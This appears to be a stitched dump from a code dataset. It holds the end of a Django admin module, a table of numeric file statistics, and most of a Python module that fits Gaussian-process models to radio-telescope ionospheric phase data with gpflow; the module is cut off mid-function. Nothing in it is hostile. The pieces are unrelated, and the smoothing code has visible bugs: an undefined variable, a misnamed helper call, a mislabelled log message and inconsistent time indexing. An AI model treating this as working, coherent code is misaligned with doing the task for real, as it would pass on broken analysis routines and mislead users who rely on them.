if meta_data_field not in readonly_fields:
readonly_fields.append(meta_data_field)
return readonly_fields
class MetaDataTabularInline(admin.TabularInline):
meta_data_fields = (
'created_at',
'updated_at',
'deleted_at',
)
def get_readonly_fields(self, request, obj=None) -> list:
readonly_fields = list(super().get_readonly_fields(request, obj))
for meta_data_field in self.meta_data_fields:
if meta_data_field not in readonly_fields:
readonly_fields.append(meta_data_field)
return readonly_fields
| 27.90566
| 73
| 0.665991
| 176
| 1,479
| 5.238636
| 0.198864
| 0.273319
| 0.126898
| 0.06833
| 0.843818
| 0.843818
| 0.843818
| 0.843818
| 0.843818
| 0.843818
| 0
| 0
| 0.254226
| 1,479
| 52
| 74
| 28.442308
| 0.835902
| 0
| 0
| 0.810811
| 0
| 0
| 0.060852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.027027
| 0
| 0.351351
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ba485ab50621e156517f6f73840af8c829acae1
| 45,569
|
py
|
Python
|
src/ionotomo/bayes/smoothing.py
|
Joshuaalbert/IonoTomo
|
9f50fbac698d43a824dd098d76dce93504c7b879
|
[
"Apache-2.0"
] | 7
|
2017-06-22T08:47:07.000Z
|
2021-07-01T12:33:02.000Z
|
src/ionotomo/bayes/smoothing.py
|
Joshuaalbert/IonoTomo
|
9f50fbac698d43a824dd098d76dce93504c7b879
|
[
"Apache-2.0"
] | 1
|
2019-04-03T15:21:19.000Z
|
2019-04-03T15:48:31.000Z
|
src/ionotomo/bayes/smoothing.py
|
Joshuaalbert/IonoTomo
|
9f50fbac698d43a824dd098d76dce93504c7b879
|
[
"Apache-2.0"
] | 2
|
2020-03-01T16:20:00.000Z
|
2020-07-07T15:09:02.000Z
|
import numpy as np
import tensorflow as tf
import logging
logging.basicConfig(format='%(asctime)s %(message)s')
import pylab as plt
import cmocean
from scipy.spatial import cKDTree
from ionotomo.tomography.pipeline import Pipeline
from ionotomo.settings import TFSettings
from timeit import default_timer
from ionotomo import *
import astropy.coordinates as ac
import astropy.units as au
import gpflow as gp
import sys
import h5py
import threading
from timeit import default_timer
#%matplotlib notebook
from concurrent import futures
from functools import partial
from threading import Lock
import astropy.units as au
import astropy.time as at
from collections import deque
from ionotomo.bayes.gpflow_contrib import GPR_v2,Gaussian_v2
from scipy.cluster.vq import kmeans2
class Smoothing(object):
"""
Class for all types of GP smoothing/conditioned prediction
"""
def __init__(self,datapack):
if isinstance(datapack, str):
datapack = DataPack(filename=datapack)
self.datapack = datapack
def _make_coord_array(t,d,f):
"""Static method to pack coordinates
"""
Nt,Nd,Nf = t.shape[0],d.shape[0], f.shape[0]
X = np.zeros([Nt,Nd,Nf,4],dtype=np.float64)
for j in range(Nt):
for k in range(Nd):
for l in range(Nf):
X[j,k,l,0:2] = d[k,:]
X[j,k,l,2] = t[j]
X[j,k,l,3] = f[l]
X = np.reshape(X,(Nt*Nd*Nf,4))
return X
def _solve_svgp(coords, data, var=None, M = 100, minibatch_size=500, iterations=1000, ARD=True, lock = None):
assert len(coords) == len(data.shape)-1
num_latent = data.shape[-1]
data_mean = [data[...,i].mean() for i in range(num_latent)]
data_std = [data[...,i].std() for i in range(num_latent)]
data = np.stack([(data[...,i] - d_m)/d_s for i,(d_m,d_s) in enumerate(zip(data_mean,data_std))],axis=-1)
Y = data.reshape((-1,num_latent))
x_mean = [c.mean() for c in coords]
x_std = [c.std() for c in coords]
coords = [(c-c_m)/c_s for c,c_m,c_s in zip(coords, x_means,x_std)]
X = Smoothing._make_coords_array(*coords)
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
if lock is not None:
lock.acquire()
try:
with gp.defer_build():
kern = gp.kernels.RBF(len(coords),ARD=True)
kern.lengthscales.prior = gp.priors.Gaussian(0.,1/3.)
mean = gp.mean_functions.Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian() if var is None else Gaussian_v2(Y_var=var, trainable=False),
Z=Z, num_latent=num_latent, minibatch_size=minibatch_size, whiten=True)
m.feature.set_trainable(False)
m.compile()
finally:
if lock is not None:
lock.release()
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
ystar,varstar = m.predict_y(X)
ystar = ystar.reshape(data.shape)
ystar = np.stack([ystar[...,i]*d_s + d_m for i,(d_m,d_s) in enumerate(zip(data_mean,data_std))],axis=-1)
varstar = varstar.reshape(data.shape)
varstar = np.stack([varstar[...,i]*d_s**2 for i,(d_m,d_s) in enumerate(zip(data_mean,data_std))],axis=-1)
return ystar, varstar
def _solve_block_svgp(phase, error, coords, lock, init=(None,None),pargs=None,verbose=False):
try:
if verbose:
logging.warning("{}".format(pargs))
error_scale = np.mean(np.abs(phase))*0.1/np.mean(error)
if verbose:
logging.warning("Error scaling {}".format(error_scale))
y_mean = np.mean(phase)
y_scale = np.std(phase) + 1e-6
y = (phase - y_mean)/y_scale
y = y.flatten()[:,None]
var = (error/y_scale*error_scale)**2
var = var.flatten()
t,d,f = coords
t_scale = np.max(t) - np.min(t) + 1e-6
d_scale = np.std(d - np.mean(d,axis=0)) + 1e-6
f_scale = np.max(f) - np.min(f) + 1e-6
t = (t - np.mean(t))/(t_scale+1e-6)
d = (d - np.mean(d,axis=0))/(d_scale+1e-6)
f = (f - np.mean(f))/(f_scale+1e-6)
X = Smoothing._make_coord_array(t,d,f)
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
lock.acquire()
try:
with gp.defer_build():
if init[0] is None:
k_space = gp.kernels.RBF(2,active_dims = [0,1],lengthscales=[0.3])
else:
k_space = gp.kernels.RBF(2,active_dims = [0,1],lengthscales=[init[0]/d_scale])
logging.warning('Using spatial scale: {}'.format(init[0]))
k_space.lengthscales.set_trainable(False)
if init[1] is None:
k_time = gp.kernels.RBF(1,active_dims = [2],lengthscales=[0.3])
else:
k_time = gp.kernels.RBF(1,active_dims = [2],lengthscales=[init[1]/t_scale])
logging.warning('Using spatial scale: {}'.format(init[1]))
k_time.lengthscales.set_trainable(False)
k_freq = gp.kernels.RBF(1,active_dims = [3], lengthscales=[10.])
#k_white = gp.kernels.White(4)
kern = k_space * k_time * k_freq# + k_white
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, y, kern, mean_function = mean,
likelihood=Gaussian_v2(Y_var=var, trainable=False),
Z=Z, num_latent=1, minibatch_size=100, whiten=True)
m.feature.set_trainable(False)
m.kern.rbf_1.lengthscales.prior = gp.priors.Gaussian(1./d_scale,0.5/d_scale)
m.kern.rbf_2.lengthscales.prior = gp.priors.Gaussian(0,1./3.)
m.kern.rbf_3.lengthscales.set_trainable(False)
m.compile()
finally:
lock.release()
iterations=200
gp.train.AdamOptimizer(0.1).minimize(m, maxiter=iterations)
if verbose:
logging.warning(m)
kern_lengthscales = (
m.kern.rbf_1.lengthscales.value[0]*d_scale,
m.kern.rbf_2.lengthscales.value[0]*t_scale,
m.kern.rbf_3.lengthscales.value[0]*f_scale
)
kern_variance = m.kern.rbf_1.variance.value*m.kern.rbf_2.variance.value*m.kern.rbf_3.variance.value*y_scale**2
if verbose:
logging.warning(kern_lengthscales)
logging.warning(kern_variance)
return kern_lengthscales, kern_variance
except Exception as e:
print(e)
def _solve_block(phase, error, coords, lock, pargs=None,verbose=False):
try:
if verbose:
logging.warning("{}".format(pargs))
error_scale = np.mean(np.abs(phase))*0.1/np.mean(error)
if verbose:
logging.warning("Error scaling {}".format(error_scale))
y_mean = np.mean(phase)
y_scale = np.std(phase) + 1e-6
y = (phase - y_mean)/y_scale
y = y.flatten()[:,None]
var = (error/y_scale*error_scale)**2
var = var.flatten()
t,d,f = coords
t_scale = np.max(t) - np.min(t) + 1e-6
d_scale = np.std(d - np.mean(d,axis=0)) + 1e-6
f_scale = np.max(f) - np.min(f) + 1e-6
t = (t - np.mean(t))/(t_scale+1e-6)
d = (d - np.mean(d,axis=0))/(d_scale+1e-6)
f = (f - np.mean(f))/(f_scale+1e-6)
X = Smoothing._make_coord_array(t,d,f)
###
# stationary points
d_slice = np.s_[:]
t_slice = np.s_[len(t)>>1:(len(t)>>1) + 10]
f_slice = np.s_[len(f)>>1:(len(f)>>1)+1]
Z = Smoothing._make_coord_array(t[t_slice],d[d_slice,:],f[f_slice])
Zy = ((phase[t_slice,d_slice,f_slice] - y_mean)/y_scale).flatten()[:,None]
Zvar = (error[t_slice,d_slice,f_slice].flatten() / y_scale * error_scale)**2
with tf.Session(graph=tf.Graph()) as sess:
lock.acquire()
try:
with gp.defer_build():
k_space = gp.kernels.RBF(2,active_dims = [0,1],lengthscales=[0.1])
k_time = gp.kernels.RBF(1,active_dims = [2],lengthscales=[0.25])
k_freq = gp.kernels.RBF(1,active_dims = [3], lengthscales=[10.0])
#k_white = gp.kernels.White(4)
kern = k_space * k_time * k_freq# + k_white
mean = gp.mean_functions.Constant()
m = GPR_v2(X, y, kern, Z=Z,Zy=Zy,Zvar=Zvar, mean_function=mean,var=var,trainable_var=False, minibatch_size=400)
m.kern.rbf_3.lengthscales.set_trainable(False)
m.compile()
finally:
lock.release()
o = gp.train.ScipyOptimizer(method='BFGS')
#o = gp.train.AdamOptimizer(0.01)
sess = m.enquire_session()
with sess.as_default():
marginal_log_likelihood = [m.objective.eval()]
for i in range(3):
o.minimize(m,maxiter=4)
#marginal_log_likelihood.append(m.objective.eval())
#print(marginal_log_likelihood[-1])
#plt.plot(marginal_log_likelihood)
#plt.show()
if verbose:
logging.warning(m)
kern_lengthscales = (
m.kern.rbf_1.lengthscales.value[0]*d_scale,
m.kern.rbf_2.lengthscales.value[0]*t_scale,
m.kern.rbf_3.lengthscales.value[0]*f_scale
)
kern_variance = m.kern.rbf_1.variance.value*m.kern.rbf_2.variance.value*m.kern.rbf_3.variance.value*y_scale**2
if verbose:
logging.warning(kern_lengthscales)
logging.warning(kern_variance)
return kern_lengthscales, kern_variance
except Exception as e:
print(e)
def _ref_distance(self,antennas,i0=0):
x = antennas.x.to(au.km).value
y = antennas.y.to(au.km).value
z = antennas.z.to(au.km).value
dist = np.sqrt((x-x[i0])**2 + (y-y[i0])**2 + (z-z[i0])**2)
return dist
def refine_statistics_timeonly(self,results_file):
plt.style.use('ggplot')
antennas,antenna_labels = self.datapack.get_antennas(-1)
data = np.load(results_file)
# antenna, time
length_scales = data['kern_ls'][:,:,0]
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,1],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
# X[j,k,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,1))
Xs = (times[:,None]-time_mean)/time_std
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
kern = k_time
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=1000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(Xs)
y = y*y_std + y_mean
y = y.reshape((Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(length_scales.shape[0])]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
ax.plot(times,y[:,0],color='blue',label='Bayes')
ax.fill_between(times,y[:,0]+std[:,0],y[:,0]-std[:,0],alpha=0.25,color='blue')
ax.set_ylim([0.25,2.75])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen directional correlation scale (deg)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_directional_scale_timeonly.png'))
plt.show()
# antenna, time, 1
l_space = y.copy()
# antenna, time
length_scales = data['kern_ls'][:,:,1]
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,1],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
# X[j,k,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,1))
Xs = (times[:,None] - time_mean)/time_std
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
kern = k_time
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=1000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(Xs)
y = y*y_std + y_mean
y = y.reshape((Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(length_scales.shape[0])]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
ax.plot(times,y[:,0],color='blue',label='Bayes')
ax.fill_between(times,y[:,0]+std[:,0],y[:,0]-std[:,0],alpha=0.25,color='blue')
ax.set_ylim([0.,700.])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen temporal correlation scale (seconds)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_temporal_scale_timeonly.png'))
plt.show()
# antenna, time, 1
l_time = y.copy()
###
# var scale
# antenna, time
length_scales = np.log10(data['kern_var'][:,:,0])
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,1],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
# X[j,k,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,1))
Xs = (times[:,None] - time_mean)/time_std
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
kern = k_time
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=1000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(Xs)
y = y*y_std + y_mean
y = y.reshape((Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(length_scales.shape[0])]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
ax.plot(times,y[:,0],color='blue',label='Bayes')
ax.fill_between(times,y[:,0]+std[:,0],y[:,0]-std[:,0],alpha=0.25,color='blue')
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen log-variance correlation scale (mag.rad.)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_variance_scale_timeonly.png'))
plt.show()
return np.concatenate([l_space,l_time],axis=-1)
def refine_statistics(self,results_file):
plt.style.use('ggplot')
antennas,antenna_labels = self.datapack.get_antennas(-1)
data = np.load(results_file)
# antenna, time
length_scales = data['kern_ls'][:,:,0]
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,3],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
X[k,j,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,3))
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
k_space = gp.kernels.RBF(2,active_dims = [1,2],lengthscales=[0.5])
kern = k_time*k_space
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
k_space.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=2000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(X)
y = y*y_std + y_mean
y = y.reshape((Np,Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Np,Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(y.shape[0])]
[ax.plot(times,y[i,:,0],color='blue',lw = 2.,label='Bayes'if i == 0 else None,alpha=0.5) for i in range(61)]
# [ax.fill_between(times,y[i,:,0]+0.5*std[i,:,0],y[i,:,0]-0.5*std[i,:,0],alpha=0.1,color='blue',label='Bayes'if i == 0 else None) for i in range(61)]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
#ax.fill_between(times,y[0,:,0]+std[0,:,0],y[0,:,0]-std[0,:,0],alpha=0.25,color='blue')
ax.set_ylim([0.25,2.75])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen directional correlation scale (deg)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_directional_scale.png'))
plt.show()
# antenna, time
length_scales = data['kern_ls'][:,:,1]
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,3],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
X[k,j,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,3))
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
k_space = gp.kernels.RBF(2,active_dims = [1,2],lengthscales=[0.5])
kern = k_time*k_space
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
k_space.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=2000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(X)
y = y*y_std + y_mean
y = y.reshape((Np,Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Np,Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(y.shape[0])]
[ax.plot(times,y[i,:,0],color='blue',lw = 2.,label='Bayes'if i == 0 else None,alpha=0.5) for i in range(61)]
# [ax.fill_between(times,y[i,:,0]+0.5*std[i,:,0],y[i,:,0]-0.5*std[i,:,0],alpha=0.1,color='blue',label='Bayes'if i == 0 else None) for i in range(61)]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
#ax.fill_between(times,y[0,:,0]+std[0,:,0],y[0,:,0]-std[0,:,0],alpha=0.25,color='blue')
ax.set_ylim([0.,700.])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen temporal correlation scale (seconds)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_temporal_scale.png'))
plt.show()
###
# var correlation scale
# antenna, time
length_scales = np.log10(data['kern_var'][:,:,0])
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,3],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
X[k,j,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,3))
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
k_space = gp.kernels.RBF(2,active_dims = [1,2],lengthscales=[0.5])
kern = k_time*k_space
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
k_space.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=2000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(X)
y = y*y_std + y_mean
y = y.reshape((Np,Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Np,Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(y.shape[0])]
[ax.plot(times,y[i,:,0],color='blue',lw = 2.,label='Bayes'if i == 0 else None,alpha=0.5) for i in range(61)]
# [ax.fill_between(times,y[i,:,0]+0.5*std[i,:,0],y[i,:,0]-0.5*std[i,:,0],alpha=0.1,color='blue',label='Bayes'if i == 0 else None) for i in range(61)]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
#ax.fill_between(times,y[0,:,0]+std[0,:,0],y[0,:,0]-std[0,:,0],alpha=0.25,color='blue')
#ax.set_ylim([0.,700.])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen log-variance correlation scale (mag.rad.)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_variance_scale.png'))
plt.show()
return
def solve_time_intervals(self, save_file, ant_idx, time_idx, dir_idx, freq_idx, interval, shift, num_threads=1,verbose=False, refined_params = None):
"""
Solve for kernel characteristics over given domain.
ant_idx, time_idx, dir_idx, freq_idx: the domain selectors
interval: int interval in time to solve.
shift: int the shift in time between solves.
num_threads: int (default 1) the number of parallel solvers.
Return interval start array, interval end array,
the kernel length scales per antenna and variances per antenna
"""
datapack = self.datapack
directions, patch_names = datapack.get_directions(dir_idx)
times,timestamps = datapack.get_times(time_idx)
antennas,antenna_labels = datapack.get_antennas(ant_idx)
freqs = datapack.get_freqs(freq_idx)
if ant_idx is -1:
ant_idx = range(len(antennas))
if time_idx is -1:
time_idx = range(len(times))
if freq_idx is -1:
freq_idx = range(len(freqs))
if dir_idx is -1:
dir_idx = range(len(directions))
phase = datapack.get_phase(ant_idx,time_idx,dir_idx,freq_idx)
Na,Nt,Nd,Nf = phase.shape
logging.warning("Working on shapes {}".format(phase.shape))
assert interval <= Nt
variance = datapack.get_variance(ant_idx,time_idx,dir_idx,freq_idx)
error = np.sqrt(variance)
data_mask = variance < 0
error[data_mask] = 10.
logging.warning("Total masked phases: {}".format(np.sum(data_mask)))
uvw = UVW(location=datapack.radio_array.get_center(), obstime=times[0],
phase=datapack.get_center_direction())
dirs_uvw = directions.transform_to(uvw)
#already centered on zero
# d = np.array([np.arctan2(dirs_uvw.u.value, dirs_uvw.w.value),
# np.arctan2(dirs_uvw.v.value, dirs_uvw.w.value)]).T
d = np.array([directions.ra.deg, directions.dec.deg]).T
t = times.gps
f = freqs
directional_sampling = 1
time_sampling = 1
freq_sampling = 1
directional_slice = slice(0,Nd,directional_sampling)
freq_slice = slice(0,Nf,freq_sampling)
lock = Lock()
with futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
jobs = []
for i,ai in enumerate(ant_idx):
for j,aj in enumerate(time_idx[::shift]):
start = j*shift
stop = min(start+interval,Nt)
time_slice = slice(start,stop,time_sampling)
if refined_params is not None:
init = refined_params[j,:]
else:
init = [None,None]
jobs.append(executor.submit(
Smoothing._solve_block_svgp,
phase[i,time_slice,directional_slice,freq_slice],
error[i,time_slice,directional_slice,freq_slice],
(t[time_slice],d[directional_slice],f[freq_slice]),
lock,
init=init,
pargs="Working on {} time chunk ({}) {} to ({}) {}".format(antenna_labels[i],
start,timestamps[start],stop-1,timestamps[stop-1]),
verbose=verbose
)
)
ref_dist = []
for j,aj in enumerate(time_idx[::shift]):
start = j*shift
stop = min(start+interval,Nt)
ref_dist.append(self._ref_distance(
antennas, i0=0))
ref_dist = np.stack(ref_dist,axis=0)
results = futures.wait(jobs)
if verbose:
logging.warning(results)
Nt_ = len(jobs)//Na
kern_lengthscales = np.zeros([Na,Nt_,3])
kern_variances = np.zeros([Na,Nt_,1])
mean_time = np.zeros(Nt_)
results = [j.result() for j in jobs]
res_idx = 0
for i,ai in enumerate(ant_idx):
for j,aj in enumerate(time_idx[::shift]):
start = j*interval
stop = min((j+1)*interval,Nt)
time_slice = slice(start,stop,time_sampling)
mean_time[j] = np.mean(t[time_slice])
res = results[res_idx]
res_idx += 1
kern_lengthscales[i,j,:] = res[0]
kern_variances[i,j,0] = res[1]
np.savez(save_file,**{"kern_ls":kern_lengthscales,"kern_var":kern_variances,"time":mean_time,"antenna":antenna_labels,"ref_dist":ref_dist})
def _apply_block_svgp(phase, error, coords, lock, kern_params,pargs=None,verbose=False):
try:
if verbose:
logging.warning("{}".format(pargs))
error_scale = np.mean(np.abs(phase))*0.1/np.mean(error)
if verbose:
logging.warning("Error scaling {}".format(error_scale))
Nt,Nd,Nf = phase.shape
y_mean = np.mean(phase)
y_scale = np.std(phase) + 1e-6
